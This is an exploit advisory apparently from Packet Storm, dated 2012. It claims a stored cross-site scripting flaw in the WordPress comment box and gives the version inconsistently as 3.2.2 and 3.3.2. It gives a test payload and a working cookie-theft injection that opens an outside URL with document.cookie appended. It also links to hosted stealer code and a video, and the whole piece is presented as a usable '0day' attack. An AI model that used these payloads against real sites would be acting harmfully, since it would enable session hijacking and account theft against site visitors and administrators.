WordPress version 3.2.2 may suffer from a stored cross site scripting vulnerability.
2ebcbd38023e368339ade1b119d6971e1e6b68217c6ad6a2682302840b7da0a9######################
# Author : L3b-r1'z
# Tilte : Wordpress 0day Cross Site Scripting (STORED) Version 3.3.2
# Date : 2012-May-04
# Email : L3br1z@gmail.com
######################
Desc :
This Exploit In Comment b0x , if you put <script>alert(1337)</script> You
will See The Alert :) .
Note :
If Admin Active When You Make Comment Not Published ( Not Work Exploit :D ).
How We Steal Coockie :D :
By b0x {
The Code Is Here :
https://www.poletti.info//public/sito/img/db/girocollo/code.txt
The Inject : <script>window.open("
https://www.poletti.info//public/sito/img/db/girocollo/code.php?c=
"+document.cookie)</script>
See The Video For More Information :
https://www.4shared.com/rar/f7z84vvj/xsswp.html
Thx To : The Injector , b0x , Mr.Thmoory , Damane2011 , Sec4ever , N4SS1m ,
B07 M4S73r , Hacker-1420 , The Viper , Exp-Bl00d And All My Friends.
And : PacketstormSecurity.com , 1337day.com , exploit4arab.com ,
exploit-db.com .
NO MORE 0DAY :)
--
L3b-r1'z .
proud to be lebanese :)
Sec4Ever.Com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed